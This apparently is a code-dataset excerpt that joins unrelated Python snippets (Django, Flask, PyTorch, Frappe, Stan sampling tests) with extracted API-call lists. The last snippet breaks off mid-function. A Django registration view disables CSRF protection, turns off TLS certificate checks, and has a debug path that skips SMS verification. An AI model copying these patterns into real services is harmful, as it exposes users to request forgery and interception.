name='warehouse',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='cargoin_by_warehouse', to='app_warehouse.Warehouse'),
),
migrations.AlterField(
model_name='cargoout',
name='goods',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='cargoout_by_goods', to='app_goods.Goods'),
),
migrations.AlterField(
model_name='cargoout',
name='order',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='cargoout_by_order', to='app_order.Order'),
),
migrations.AlterField(
model_name='cargoout',
name='warehouse',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='cargoout_by_warehouse', to='app_warehouse.Warehouse'),
),
]
|
[
"django.db.models.CharField",
"django.db.models.IntegerField",
"django.db.models.DateTimeField",
"django.db.models.ForeignKey"
] |
[((363, 434), 'django.db.models.CharField', 'models.CharField', ([], {'default': '"""default"""', 'max_length': '(20)', 'verbose_name': '"""入库原因"""'}), "(default='default', max_length=20, verbose_name='入库原因')\n", (379, 434), False, 'from django.db import migrations, models\n'), ((558, 632), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'blank': '(True)', 'default': '(72)', 'null': '(True)', 'verbose_name': '"""保质期"""'}), "(blank=True, default=72, null=True, verbose_name='保质期')\n", (577, 632), False, 'from django.db import migrations, models\n'), ((754, 825), 'django.db.models.CharField', 'models.CharField', ([], {'default': '"""default"""', 'max_length': '(20)', 'verbose_name': '"""出库原因"""'}), "(default='default', max_length=20, verbose_name='出库原因')\n", (770, 825), False, 'from django.db import migrations, models\n'), ((947, 1095), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'blank': '(True)', 'null': '(True)', 'on_delete': 'django.db.models.deletion.DO_NOTHING', 'related_name': '"""cargoin_by_goods"""', 'to': '"""app_goods.Goods"""'}), "(blank=True, null=True, on_delete=django.db.models.\n deletion.DO_NOTHING, related_name='cargoin_by_goods', to='app_goods.Goods')\n", (964, 1095), False, 'from django.db import migrations, models\n'), ((1216, 1280), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'blank': '(True)', 'null': '(True)', 'verbose_name': '"""过期时间"""'}), "(blank=True, null=True, verbose_name='过期时间')\n", (1236, 1280), False, 'from django.db import migrations, models\n'), ((1406, 1571), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'blank': '(True)', 'null': '(True)', 'on_delete': 'django.db.models.deletion.DO_NOTHING', 'related_name': '"""cargoin_by_warehouse"""', 'to': '"""app_warehouse.Warehouse"""'}), "(blank=True, null=True, on_delete=django.db.models.\n deletion.DO_NOTHING, related_name='cargoin_by_warehouse', to=\n 'app_warehouse.Warehouse')\n", (1423, 1571), False, 'from django.db import migrations, models\n'), ((1684, 1838), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'blank': '(True)', 'null': '(True)', 'on_delete': 'django.db.models.deletion.DO_NOTHING', 'related_name': '"""cargoout_by_goods"""', 'to': '"""app_goods.Goods"""'}), "(blank=True, null=True, on_delete=django.db.models.\n deletion.DO_NOTHING, related_name='cargoout_by_goods', to='app_goods.Goods'\n )\n", (1701, 1838), False, 'from django.db import migrations, models\n'), ((1951, 2105), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'blank': '(True)', 'null': '(True)', 'on_delete': 'django.db.models.deletion.DO_NOTHING', 'related_name': '"""cargoout_by_order"""', 'to': '"""app_order.Order"""'}), "(blank=True, null=True, on_delete=django.db.models.\n deletion.DO_NOTHING, related_name='cargoout_by_order', to='app_order.Order'\n )\n", (1968, 2105), False, 'from django.db import migrations, models\n'), ((2222, 2388), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'blank': '(True)', 'null': '(True)', 'on_delete': 'django.db.models.deletion.DO_NOTHING', 'related_name': '"""cargoout_by_warehouse"""', 'to': '"""app_warehouse.Warehouse"""'}), "(blank=True, null=True, on_delete=django.db.models.\n deletion.DO_NOTHING, related_name='cargoout_by_warehouse', to=\n 'app_warehouse.Warehouse')\n", (2239, 2388), False, 'from django.db import migrations, models\n')]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2021-10-21
# @Author : iamwm
from amp.broker.store import Store
class Exchange:
"""
exchange of broker
"""
def __init__(self, name: str) -> None:
self.name = name
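        # per-exchange topic registry (assuming Store.get creates missing entries)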
self.topic_manager = Store(Topic)
def bind_topic(self, topic_name: str):
self.topic_manager.get(topic_name)
EManager = Store(Exchange)
class Topic:
"""
topic of exchange
"""
def __init__(self, name: str) -> None:
self.name = name
|
[
"amp.broker.store.Store"
] |
[((393, 408), 'amp.broker.store.Store', 'Store', (['Exchange'], {}), '(Exchange)\n', (398, 408), False, 'from amp.broker.store import Store\n'), ((280, 292), 'amp.broker.store.Store', 'Store', (['Topic'], {}), '(Topic)\n', (285, 292), False, 'from amp.broker.store import Store\n')]
|
# Copyright 2020 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import torch
import torch.nn as nn
import torchvision.models as models
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
#device = torch.device("cpu")
class EncoderCNN(nn.Module):
def __init__(self, embed_size):
super(EncoderCNN, self).__init__()
resnet = models.resnet50(pretrained=True)
for param in resnet.parameters():
param.requires_grad_(False)
modules = list(resnet.children())[:-1]
self.resnet = nn.Sequential(*modules)
self.embed = nn.Linear(resnet.fc.in_features, embed_size)
def forward(self, images):
features = self.resnet(images)
features = features.view(features.size(0), -1)
features = self.embed(features)
return features
class DecoderRNN(nn.Module):
def __init__(self, embed_size, hidden_size, vocab_size, num_layers=1, drop=0.5):
super(DecoderRNN, self).__init__()
# Set the hidden size for init_hidden
self.hidden_size = hidden_size
self.num_layers = num_layers
# Set the device
self.device = device
# Embedded layer
self.embed = nn.Embedding(vocab_size, embed_size)
# LSTM layer
self.lstm = nn.LSTM(input_size=embed_size,
hidden_size=hidden_size,
num_layers=num_layers,
batch_first= True,
dropout = drop)
# Dropout Layer
self.drop = nn.Dropout(p=drop)
# Fully Connected layer
self.fc = nn.Linear(hidden_size, vocab_size)
def init_hidden(self, batch_size):
return (torch.zeros(self.num_layers, batch_size, self.hidden_size, device = device),
torch.zeros(self.num_layers, batch_size, self.hidden_size, device = device))
def forward(self, features, hidden):
# LSTM
lstm_out, hidden = self.lstm(features, hidden)
# Functional component
out = self.fc(lstm_out)
out = out.squeeze(1)
out = out.argmax(dim=1)
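        # feed the embedding of the greedy prediction back as the next input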
features = self.embed(out.unsqueeze(0))
# # Embedding the captions
# embedded = self.embed(captions)
# # print(embedded.shape)
# # print(features.unsqueeze(1).shape)
# # print(embedded.shape)
# embedded = torch.cat((features.unsqueeze(1), embedded), dim=1)
# # LSTM
# lstm_out, hidden = self.lstm(features, hidden)
# # Functional component
# out = self.fc(lstm_out)
return out, features, hidden
def sample(self, inputs, states=None, max_len=20):
" accepts pre-processed image tensor (inputs) and returns predicted sentence (list of tensor ids of length max_len) "
# Initialize the hidden state
hidden = self.init_hidden(inputs.shape[0])# features is of shape (batch_size, embed_size)
out_list = list()
word_len = 0
with torch.no_grad():
while word_len < max_len:
lstm_out, hidden = self.lstm(inputs, hidden)
out = self.fc(lstm_out)
#print(out.shape)
out = out.squeeze(1)
out = out.argmax(dim=1)
out_list.append(out.item())
inputs = self.embed(out.unsqueeze(0))
word_len += 1
                if out == 1:  # assuming index 1 is the <end> token
                    break
return out_list
|
[
"torch.nn.Dropout",
"torch.nn.Sequential",
"torch.nn.Embedding",
"torchvision.models.resnet50",
"torch.cuda.is_available",
"torch.nn.Linear",
"torch.zeros",
"torch.nn.LSTM",
"torch.no_grad"
] |
[((689, 714), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (712, 714), False, 'import torch\n'), ((883, 915), 'torchvision.models.resnet50', 'models.resnet50', ([], {'pretrained': '(True)'}), '(pretrained=True)\n', (898, 915), True, 'import torchvision.models as models\n'), ((1076, 1099), 'torch.nn.Sequential', 'nn.Sequential', (['*modules'], {}), '(*modules)\n', (1089, 1099), True, 'import torch.nn as nn\n'), ((1121, 1165), 'torch.nn.Linear', 'nn.Linear', (['resnet.fc.in_features', 'embed_size'], {}), '(resnet.fc.in_features, embed_size)\n', (1130, 1165), True, 'import torch.nn as nn\n'), ((1768, 1804), 'torch.nn.Embedding', 'nn.Embedding', (['vocab_size', 'embed_size'], {}), '(vocab_size, embed_size)\n', (1780, 1804), True, 'import torch.nn as nn\n'), ((1855, 1970), 'torch.nn.LSTM', 'nn.LSTM', ([], {'input_size': 'embed_size', 'hidden_size': 'hidden_size', 'num_layers': 'num_layers', 'batch_first': '(True)', 'dropout': 'drop'}), '(input_size=embed_size, hidden_size=hidden_size, num_layers=\n num_layers, batch_first=True, dropout=drop)\n', (1862, 1970), True, 'import torch.nn as nn\n'), ((2134, 2152), 'torch.nn.Dropout', 'nn.Dropout', ([], {'p': 'drop'}), '(p=drop)\n', (2144, 2152), True, 'import torch.nn as nn\n'), ((2212, 2246), 'torch.nn.Linear', 'nn.Linear', (['hidden_size', 'vocab_size'], {}), '(hidden_size, vocab_size)\n', (2221, 2246), True, 'import torch.nn as nn\n'), ((2311, 2384), 'torch.zeros', 'torch.zeros', (['self.num_layers', 'batch_size', 'self.hidden_size'], {'device': 'device'}), '(self.num_layers, batch_size, self.hidden_size, device=device)\n', (2322, 2384), False, 'import torch\n'), ((2404, 2477), 'torch.zeros', 'torch.zeros', (['self.num_layers', 'batch_size', 'self.hidden_size'], {'device': 'device'}), '(self.num_layers, batch_size, self.hidden_size, device=device)\n', (2415, 2477), False, 'import torch\n'), ((3663, 3678), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (3676, 3678), False, 'import torch\n')]
|
import pytest
import numpy as np
from bayesian_mmm.sampling.stan_model_generator import StanModelGenerator
from bayesian_mmm.sampling.sampler import Sampler
from bayesian_mmm.sampling.stan_model_wrapper import StanModelWrapper
MAX_LAG = 4
SPENDS = np.array([[10, 20], [0, 8], [1, 30], [5, 40]])
LAGGED_SPENDS = np.array([
[[10, 0, 0, 0], [20, 0, 0, 0]],
[[ 0, 10, 0, 0], [ 8, 20, 0, 0]],
[[ 1, 0, 10, 0], [30, 8, 20, 0]],
[[ 5, 1, 0, 10], [40, 30, 8, 20]]
])
CTRL_VARS = np.array([
[2, 4],
[5, 2],
[6, 4],
[7, 2]
])
REVENUE = np.array([1, 2, 3, 4])
N = 4
NUM_MEDIA = 2
NUM_CTRL = 2
STAN_MODEL = StanModelWrapper
@pytest.mark.parametrize(
"ctrl_vars", [CTRL_VARS, None]
)
def test_create_sampler_input(ctrl_vars):
if type(ctrl_vars) == np.ndarray:
expected_args = {
"N":N,
"Y":REVENUE,
"max_lag":MAX_LAG,
"num_media":NUM_MEDIA,
"X_media":LAGGED_SPENDS,
"num_ctrl":NUM_CTRL,
"X_ctrl":CTRL_VARS
}
else:
expected_args = {
"N":N,
"Y":REVENUE,
"max_lag":MAX_LAG,
"num_media":NUM_MEDIA,
"X_media":LAGGED_SPENDS
}
sampler = Sampler(STAN_MODEL, MAX_LAG)
sampler.create_stan_input(
SPENDS, ctrl_vars, REVENUE
)
obtained_args = sampler._Sampler__args
expected_args_keys = list(expected_args.keys())
expected_args_keys.sort()
obtained_args_keys = list(obtained_args.keys())
obtained_args_keys.sort()
assert obtained_args_keys == expected_args_keys
for key, val in expected_args.items():
if type(val) == np.ndarray:
assert (val == obtained_args[key]).all()
else:
assert val == obtained_args[key]
# slow to run (stan compilation + sampling)
@pytest.mark.parametrize(
"carryover_transfo_nm,diminushing_returns_transfo_nm,with_ctrl_vars",
[
("adstock","hill",True),
("adstock","hill",False),
("adstock","reach",True),
("adstock","reach",False),
("geo_decay","hill",True),
("geo_decay","hill",False),
("geo_decay","reach",True),
("geo_decay","reach",False)
]
)
def test_run_sampling(
carryover_transfo_nm,
diminushing_returns_transfo_nm,
with_ctrl_vars
):
CARRYOVER_TRANSFO_NM_TO_PARAM_NM = {
"geo_decay":["retain_rate"],
"adstock":["retain_rate", "delay"]
}
DIMINUSHING_RETURNS_TRANSFO_NM_TO_PARAM_NM = {
"hill":["ec", "slope"],
"reach":["half_saturation"]
}
WITH_CTRL_VARS_TO_PARAM_NM = {
True:["gamma_ctrl"],
False:[]
}
stan_model_generator = StanModelGenerator(
carryover_transfo_nm,
diminushing_returns_transfo_nm,
with_ctrl_vars
)
stan_model_generator.create_model()
stan_model = stan_model_generator.get_model()
sampler = Sampler(stan_model, MAX_LAG)
if with_ctrl_vars:
ctrl_vars = CTRL_VARS
else:
ctrl_vars = None
sampler.create_stan_input(
SPENDS,
ctrl_vars,
REVENUE
)
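    # draw posterior samples; the asserts below expect 100 draws per parameter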
obtained_results = sampler.run_sampling(100, 3)
expected_param_nms = (
CARRYOVER_TRANSFO_NM_TO_PARAM_NM[carryover_transfo_nm]
+ DIMINUSHING_RETURNS_TRANSFO_NM_TO_PARAM_NM[diminushing_returns_transfo_nm]
+ WITH_CTRL_VARS_TO_PARAM_NM[with_ctrl_vars]
+ ["beta_medias", "tau"]
)
expected_param_nms.sort()
obtained_params_nms = list(obtained_results.keys())
obtained_params_nms.sort()
assert expected_param_nms == obtained_params_nms
for param_nm, values in obtained_results.items():
if param_nm != "tau":
assert values.shape == (100,2)
else:
assert values.shape == (100,)
|
[
"bayesian_mmm.sampling.stan_model_generator.StanModelGenerator",
"pytest.mark.parametrize",
"numpy.array",
"bayesian_mmm.sampling.sampler.Sampler"
] |
[((281, 327), 'numpy.array', 'np.array', (['[[10, 20], [0, 8], [1, 30], [5, 40]]'], {}), '([[10, 20], [0, 8], [1, 30], [5, 40]])\n', (289, 327), True, 'import numpy as np\n'), ((344, 490), 'numpy.array', 'np.array', (['[[[10, 0, 0, 0], [20, 0, 0, 0]], [[0, 10, 0, 0], [8, 20, 0, 0]], [[1, 0, 10,\n 0], [30, 8, 20, 0]], [[5, 1, 0, 10], [40, 30, 8, 20]]]'], {}), '([[[10, 0, 0, 0], [20, 0, 0, 0]], [[0, 10, 0, 0], [8, 20, 0, 0]], [\n [1, 0, 10, 0], [30, 8, 20, 0]], [[5, 1, 0, 10], [40, 30, 8, 20]]])\n', (352, 490), True, 'import numpy as np\n'), ((525, 567), 'numpy.array', 'np.array', (['[[2, 4], [5, 2], [6, 4], [7, 2]]'], {}), '([[2, 4], [5, 2], [6, 4], [7, 2]])\n', (533, 567), True, 'import numpy as np\n'), ((596, 618), 'numpy.array', 'np.array', (['[1, 2, 3, 4]'], {}), '([1, 2, 3, 4])\n', (604, 618), True, 'import numpy as np\n'), ((687, 742), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""ctrl_vars"""', '[CTRL_VARS, None]'], {}), "('ctrl_vars', [CTRL_VARS, None])\n", (710, 742), False, 'import pytest\n'), ((1886, 2237), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""carryover_transfo_nm,diminushing_returns_transfo_nm,with_ctrl_vars"""', "[('adstock', 'hill', True), ('adstock', 'hill', False), ('adstock', 'reach',\n True), ('adstock', 'reach', False), ('geo_decay', 'hill', True), (\n 'geo_decay', 'hill', False), ('geo_decay', 'reach', True), ('geo_decay',\n 'reach', False)]"], {}), "(\n 'carryover_transfo_nm,diminushing_returns_transfo_nm,with_ctrl_vars', [\n ('adstock', 'hill', True), ('adstock', 'hill', False), ('adstock',\n 'reach', True), ('adstock', 'reach', False), ('geo_decay', 'hill', True\n ), ('geo_decay', 'hill', False), ('geo_decay', 'reach', True), (\n 'geo_decay', 'reach', False)])\n", (1909, 2237), False, 'import pytest\n'), ((1285, 1313), 'bayesian_mmm.sampling.sampler.Sampler', 'Sampler', (['STAN_MODEL', 'MAX_LAG'], {}), '(STAN_MODEL, MAX_LAG)\n', (1292, 1313), False, 'from bayesian_mmm.sampling.sampler import Sampler\n'), ((2756, 2848), 'bayesian_mmm.sampling.stan_model_generator.StanModelGenerator', 'StanModelGenerator', (['carryover_transfo_nm', 'diminushing_returns_transfo_nm', 'with_ctrl_vars'], {}), '(carryover_transfo_nm, diminushing_returns_transfo_nm,\n with_ctrl_vars)\n', (2774, 2848), False, 'from bayesian_mmm.sampling.stan_model_generator import StanModelGenerator\n'), ((2980, 3008), 'bayesian_mmm.sampling.sampler.Sampler', 'Sampler', (['stan_model', 'MAX_LAG'], {}), '(stan_model, MAX_LAG)\n', (2987, 3008), False, 'from bayesian_mmm.sampling.sampler import Sampler\n')]
|
from __future__ import unicode_literals
import frappe
from frappe.desk.doctype.notification_log.notification_log import enqueue_create_notification,\
get_title, get_title_html
def execute():
set_title_wp_as_civil_id()
set_title_mi_as_civil_id()
set_title_moi_as_civil_id()
set_title_fp_as_civil_id()
def set_title_wp_as_civil_id():
for doc in frappe.get_all('Work Permit'):
wp_doc = frappe.get_doc('Work Permit',doc.name)
        wp_doc.title = wp_doc.civil_id
        wp_doc.save()  # persist the title change
print(doc.name)
print(wp_doc.title)
print("===========")
def set_title_mi_as_civil_id():
for doc in frappe.get_all('Medical Insurance'):
mi_doc = frappe.get_doc('Medical Insurance',doc.name)
        mi_doc.title = mi_doc.civil_id
        mi_doc.save()
print(doc.name)
print(mi_doc.title)
print("===========")
def set_title_moi_as_civil_id():
for doc in frappe.get_all('MOI Residency Jawazat'):
moi_doc = frappe.get_doc('MOI Residency Jawazat',doc.name)
        moi_doc.title = moi_doc.one_fm_civil_id
        moi_doc.save()
print(doc.name)
print(moi_doc.title)
print("===========")
def set_title_fp_as_civil_id():
for doc in frappe.get_all('Fingerprint Appointment'):
fp_doc = frappe.get_doc('Fingerprint Appointment',doc.name)
        fp_doc.title = fp_doc.civil_id
        fp_doc.save()
print(doc.name)
print(fp_doc.title)
print("===========")
|
[
"frappe.get_doc",
"frappe.get_all"
] |
[((366, 395), 'frappe.get_all', 'frappe.get_all', (['"""Work Permit"""'], {}), "('Work Permit')\n", (380, 395), False, 'import frappe\n'), ((621, 656), 'frappe.get_all', 'frappe.get_all', (['"""Medical Insurance"""'], {}), "('Medical Insurance')\n", (635, 656), False, 'import frappe\n'), ((889, 928), 'frappe.get_all', 'frappe.get_all', (['"""MOI Residency Jawazat"""'], {}), "('MOI Residency Jawazat')\n", (903, 928), False, 'import frappe\n'), ((1175, 1216), 'frappe.get_all', 'frappe.get_all', (['"""Fingerprint Appointment"""'], {}), "('Fingerprint Appointment')\n", (1189, 1216), False, 'import frappe\n'), ((414, 453), 'frappe.get_doc', 'frappe.get_doc', (['"""Work Permit"""', 'doc.name'], {}), "('Work Permit', doc.name)\n", (428, 453), False, 'import frappe\n'), ((675, 720), 'frappe.get_doc', 'frappe.get_doc', (['"""Medical Insurance"""', 'doc.name'], {}), "('Medical Insurance', doc.name)\n", (689, 720), False, 'import frappe\n'), ((948, 997), 'frappe.get_doc', 'frappe.get_doc', (['"""MOI Residency Jawazat"""', 'doc.name'], {}), "('MOI Residency Jawazat', doc.name)\n", (962, 997), False, 'import frappe\n'), ((1235, 1286), 'frappe.get_doc', 'frappe.get_doc', (['"""Fingerprint Appointment"""', 'doc.name'], {}), "('Fingerprint Appointment', doc.name)\n", (1249, 1286), False, 'import frappe\n')]
|
import json
class Config:
def __init__(self, file=None):
with open(file) as cfg_file:
self._cfg = json.load(cfg_file)
        self._scopes = list(self._cfg['scopes'])
self._scope_index = 0
self._current_scope: dict = self._scopes[0]
def next_scope(self) -> bool:
"""
Increments the current scope. Returns `True` if successful,
otherwise `False`.
"""
if self._scope_index + 1 >= len(self._scopes):
return False
self._scope_index += 1
self._current_scope = self._scopes[self._scope_index]
return True
def prev_scope(self) -> bool:
"""
Decrements the current scope. Returns `True` if successful,
otherwise `False`.
"""
if self._scope_index - 1 < 0:
return False
self._scope_index -= 1
self._current_scope = self._scopes[self._scope_index]
return True
def actions(self, phrase: str) -> list:
"""
Returns the actions to be executed when the `phrase` is said
or an empty list if the `phrase` isn't recognized.
"""
return self._current_scope.get(phrase, [])
def phrases(self) -> set:
"""
Return the possible phrases that can be said in the current
scope.
"""
        return set(self._current_scope.keys())
def __repr__(self):
return str(self._scopes)
if __name__ == '__main__':
cfg = Config('test_format.json')
assert cfg.next_scope()
assert not cfg.next_scope()
assert cfg.prev_scope()
assert not cfg.prev_scope()
assert {'forward', 'back', 'next set'} == cfg.phrases()
assert ['right'] == cfg.actions('forward')
print("Passed")
|
[
"json.load"
] |
[((124, 143), 'json.load', 'json.load', (['cfg_file'], {}), '(cfg_file)\n', (133, 143), False, 'import json\n')]
|
import requests
import pprint
pp = pprint.PrettyPrinter(indent=4)
# Example for making a GET requests
link = 'http://localhost:5000/example-get-static'
response = requests.get(link)
responseDict = response.json()
pp.pprint(responseDict)
# access the dict
print(responseDict['num-example'])
# your name goes here
name = "name"
link2 = 'http://localhost:5000/example-get-dynamic?name={name}'.format(name=name)
response = requests.get(link2)
responseDict = response.json()
pp.pprint(responseDict)
|
[
"pprint.PrettyPrinter",
"requests.get"
] |
[((36, 66), 'pprint.PrettyPrinter', 'pprint.PrettyPrinter', ([], {'indent': '(4)'}), '(indent=4)\n', (56, 66), False, 'import pprint\n'), ((166, 184), 'requests.get', 'requests.get', (['link'], {}), '(link)\n', (178, 184), False, 'import requests\n'), ((426, 445), 'requests.get', 'requests.get', (['link2'], {}), '(link2)\n', (438, 445), False, 'import requests\n')]
|
from flask import Blueprint, render_template,request,flash,redirect,url_for
from flask_login import login_required, current_user
from .models import Pitch,User,Comment,Like
from . import db
views = Blueprint("views", __name__)
@views.route("/")
@views.route("/home")
@login_required
def home():
pitches=Pitch.query.all()
return render_template("home.html", user=current_user,pitches=pitches)
@views.route("/create-pitch", methods=['GET', 'POST'])
@login_required
def create_pitch():
if request.method =="POST":
text = request.form.get('text')
if not text:
flash('This cannot be empty',category='error')
else:
pitch=Pitch(text=text,author=current_user.id)
db.session.add(pitch)
db.session.commit()
flash('Pitch Created!!',category='success')
return redirect(url_for('views.home'))
return render_template('create_pitch.html', user=current_user)
@views.route("/delete-pitch/<id>")
@login_required
def delete_pitch(id):
pitch = Pitch.query.filter_by(id=id).first()
if not pitch:
flash("Post does not exist.", category='error')
    elif current_user.id != pitch.author:
flash('You do not have permission to delete this post.', category='error')
else:
db.session.delete(pitch)
db.session.commit()
flash('Pitch deleted.', category='success')
return redirect(url_for('views.home'))
@views.route("/pitches/<username>")
@login_required
def pitches(username):
user = User.query.filter_by(username=username).first()
if not user:
flash('No user with that username exists.', category='error')
return redirect(url_for('views.home'))
pitches=user.pitches
return render_template("pitch.html", user=current_user, pitches=pitches, username=username)
@views.route("/create-comment/<pitch_id>", methods=['POST'])
@login_required
def create_comment(pitch_id):
text = request.form.get('text')
if not text:
flash('Comment cannot be empty.', category='error')
else:
pitch = Pitch.query.filter_by(id=pitch_id)
if pitch:
comment = Comment(
text=text, author=current_user.id, pitch_id=pitch_id)
db.session.add(comment)
db.session.commit()
else:
flash('Post does not exist.', category='error')
return redirect(url_for('views.home'))
@views.route("/delete-comment/<comment_id>")
@login_required
def delete_comment(comment_id):
comment = Comment.query.filter_by(id=comment_id).first()
if not comment:
flash('Comment does not exist.', category='error')
elif current_user.id != comment.author and current_user.id != comment.pitch.author:
flash('You do not have permission to delete this comment.', category='error')
else:
db.session.delete(comment)
db.session.commit()
return redirect(url_for('views.home'))
|
[
"flask.flash",
"flask.Blueprint",
"flask.request.form.get",
"flask.url_for",
"flask.render_template"
] |
[((216, 244), 'flask.Blueprint', 'Blueprint', (['"""views"""', '__name__'], {}), "('views', __name__)\n", (225, 244), False, 'from flask import Blueprint, render_template, request, flash, redirect, url_for\n'), ((356, 420), 'flask.render_template', 'render_template', (['"""home.html"""'], {'user': 'current_user', 'pitches': 'pitches'}), "('home.html', user=current_user, pitches=pitches)\n", (371, 420), False, 'from flask import Blueprint, render_template, request, flash, redirect, url_for\n'), ((930, 985), 'flask.render_template', 'render_template', (['"""create_pitch.html"""'], {'user': 'current_user'}), "('create_pitch.html', user=current_user)\n", (945, 985), False, 'from flask import Blueprint, render_template, request, flash, redirect, url_for\n'), ((1779, 1868), 'flask.render_template', 'render_template', (['"""pitch.html"""'], {'user': 'current_user', 'pitches': 'pitches', 'username': 'username'}), "('pitch.html', user=current_user, pitches=pitches, username=\n username)\n", (1794, 1868), False, 'from flask import Blueprint, render_template, request, flash, redirect, url_for\n'), ((1983, 2007), 'flask.request.form.get', 'request.form.get', (['"""text"""'], {}), "('text')\n", (1999, 2007), False, 'from flask import Blueprint, render_template, request, flash, redirect, url_for\n'), ((559, 583), 'flask.request.form.get', 'request.form.get', (['"""text"""'], {}), "('text')\n", (575, 583), False, 'from flask import Blueprint, render_template, request, flash, redirect, url_for\n'), ((1136, 1183), 'flask.flash', 'flash', (['"""Post does not exist."""'], {'category': '"""error"""'}), "('Post does not exist.', category='error')\n", (1141, 1183), False, 'from flask import Blueprint, render_template, request, flash, redirect, url_for\n'), ((1449, 1470), 'flask.url_for', 'url_for', (['"""views.home"""'], {}), "('views.home')\n", (1456, 1470), False, 'from flask import Blueprint, render_template, request, flash, redirect, url_for\n'), ((1633, 1694), 'flask.flash', 'flash', (['"""No user with that username exists."""'], {'category': '"""error"""'}), "('No user with that username exists.', category='error')\n", (1638, 1694), False, 'from flask import Blueprint, render_template, request, flash, redirect, url_for\n'), ((2034, 2085), 'flask.flash', 'flash', (['"""Comment cannot be empty."""'], {'category': '"""error"""'}), "('Comment cannot be empty.', category='error')\n", (2039, 2085), False, 'from flask import Blueprint, render_template, request, flash, redirect, url_for\n'), ((2429, 2450), 'flask.url_for', 'url_for', (['"""views.home"""'], {}), "('views.home')\n", (2436, 2450), False, 'from flask import Blueprint, render_template, request, flash, redirect, url_for\n'), ((2636, 2686), 'flask.flash', 'flash', (['"""Comment does not exist."""'], {'category': '"""error"""'}), "('Comment does not exist.', category='error')\n", (2641, 2686), False, 'from flask import Blueprint, render_template, request, flash, redirect, url_for\n'), ((2955, 2976), 'flask.url_for', 'url_for', (['"""views.home"""'], {}), "('views.home')\n", (2962, 2976), False, 'from flask import Blueprint, render_template, request, flash, redirect, url_for\n'), ((626, 673), 'flask.flash', 'flash', (['"""This cannot be empty"""'], {'category': '"""error"""'}), "('This cannot be empty', category='error')\n", (631, 673), False, 'from flask import Blueprint, render_template, request, flash, redirect, url_for\n'), ((823, 867), 'flask.flash', 'flash', (['"""Pitch Created!!"""'], {'category': '"""success"""'}), "('Pitch Created!!', category='success')\n", (828, 867), False, 'from flask import Blueprint, render_template, request, flash, redirect, url_for\n'), ((891, 912), 'flask.url_for', 'url_for', (['"""views.home"""'], {}), "('views.home')\n", (898, 912), False, 'from flask import Blueprint, render_template, request, flash, redirect, url_for\n'), ((1230, 1304), 'flask.flash', 'flash', (['"""You do not have permission to delete this post."""'], {'category': '"""error"""'}), "('You do not have permission to delete this post.', category='error')\n", (1235, 1304), False, 'from flask import Blueprint, render_template, request, flash, redirect, url_for\n'), ((1384, 1427), 'flask.flash', 'flash', (['"""Pitch deleted."""'], {'category': '"""success"""'}), "('Pitch deleted.', category='success')\n", (1389, 1427), False, 'from flask import Blueprint, render_template, request, flash, redirect, url_for\n'), ((1719, 1740), 'flask.url_for', 'url_for', (['"""views.home"""'], {}), "('views.home')\n", (1726, 1740), False, 'from flask import Blueprint, render_template, request, flash, redirect, url_for\n'), ((2360, 2407), 'flask.flash', 'flash', (['"""Post does not exist."""'], {'category': '"""error"""'}), "('Post does not exist.', category='error')\n", (2365, 2407), False, 'from flask import Blueprint, render_template, request, flash, redirect, url_for\n'), ((2783, 2860), 'flask.flash', 'flash', (['"""You do not have permission to delete this comment."""'], {'category': '"""error"""'}), "('You do not have permission to delete this comment.', category='error')\n", (2788, 2860), False, 'from flask import Blueprint, render_template, request, flash, redirect, url_for\n')]
|
from django.shortcuts import render, render_to_response
from django import forms
from django.http import HttpResponse
from django.forms import ModelForm
from user_manage.models import User
from django.views.decorators.csrf import csrf_exempt
from django.utils import timezone
import requests
from colock.key_generator import *
from colock.utils import hook
import json
import colock.Error
class RegisterForm(ModelForm):
class Meta:
model = User
fields = ['cid', 'phone_num', 'region_num', 'nickname', 'user_name', 'user_logo']
verify_code = forms.IntegerField()
class RegisterReturnForm(forms.Form):
uid = forms.IntegerField()
ukey = forms.CharField(max_length=32)
class MobSMS:
def __init__(self, appkey):
self.appkey = appkey
self.verify_url = 'https://api.sms.mob.com/sms/verify'
    def verify_sms_code(self, zone, phone, code, debug=False):
        # normalize every branch to a JSON string so callers can json.loads() the result
        if debug:
            return json.dumps({'status': 200})
        data = {'appkey': self.appkey, 'phone': phone, 'zone': zone, 'code': code}
        req = requests.post(self.verify_url, data=data, verify=False)
        if req.status_code == 200:
            return json.dumps(req.json())
        return json.dumps({'status': 500})
# this is not safe!!!
@csrf_exempt
def register(request):
def register_verify(user, vcode):
res = mobsms.verify_sms_code(user.region_num, user.phone_num, vcode)
        return json.loads(res)['status'] == 200
if request.method == "POST":
reg_form = RegisterForm(request.POST)
if reg_form.is_valid():
new_user = reg_form.save(commit=False)
new_user.reg_time = timezone.now()
new_user.ukey = user_key_gen(new_user.id, new_user.region_num, new_user.phone_num, new_user.reg_time)
new_user.phone_hash = phone_hash_gen(new_user.region_num, new_user.phone_num)
new_user.user_logo = request.FILES['user_logo']
verify_code = request.POST['verify_code']
            if register_verify(new_user, verify_code):
new_user.save()
return_value = {'uid': new_user.id, 'ukey': new_user.ukey}
# ensure_ascii=False to handle Chinese
